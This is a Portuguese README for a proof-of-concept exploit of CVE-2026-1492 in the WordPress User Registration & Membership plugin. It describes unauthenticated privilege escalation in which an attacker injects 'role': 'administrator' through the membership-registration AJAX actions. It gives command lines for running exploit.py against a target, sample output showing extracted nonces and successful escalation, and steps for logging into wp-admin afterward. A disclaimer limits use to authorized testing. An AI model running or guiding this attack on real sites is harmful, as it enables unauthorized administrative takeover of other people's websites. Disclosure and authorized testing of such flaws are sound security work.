
Prova de conceito de exploit para CVE-2026-1492 no plugin User Registration do WordPress, permitindo escalonamento de privilégios não autenticado para administrador por meio de registro de associação elaborado.
Este repositório contém uma prova de conceito de exploit para CVE-2026-1492, uma vulnerabilidade crítica que afeta o plugin User Registration & Membership do WordPress.
A vulnerabilidade permite que atacantes não autenticados criem contas de administrador abusando do processo de registro de associação.
👉 Uma análise técnica completa desta vulnerabilidade está disponível aqui:
Análise Técnica
Ela explica passo a passo como o backend processa dados controlados pelo atacante e por que a escalação de privilégios é possível.
O plugin confia indevidamente em dados controlados pelo usuário durante o processo de registro de associação.
Especificamente:
role fornecido pelo usuárioIsso permite que atacantes definam:
"role": "administrator"
e obtenham acesso administrativo total.
A exploração bem-sucedida permite:
A vulnerabilidade é acionada por meio de um processo AJAX de várias etapas:
user_registration_user_form_submituser_registration_membership_register_memberadministrator)python3 exploit.py -t http://alvo -ru 'http://alvo/?page_id=6'
python3 exploit.py -t http://localhost:5000 -ru 'http://localhost:5000/?page_id=6'
[*] Extraindo tokens...
[+] form_id: 5
[+] frontend_nonce: XXXXX
[+] security: XXXXX
[+] wpnonce: XXXXX
[+] membership_id: 12
[*] Enviando requisição de registro...
[+] Usuário criado
[*] Enviando requisição de associação...
[+] Escalação de privilégios bem-sucedida
Faça login usando as credenciais geradas:
http://alvo/wp-login.php
Em seguida, acesse o painel administrativo:
http://alvo/wp-admin/
Observação: O caminho administrativo pode ser personalizado.
Este exploit é fornecido apenas para fins educacionais e testes de segurança autorizados.
Não use contra sistemas sem permissão.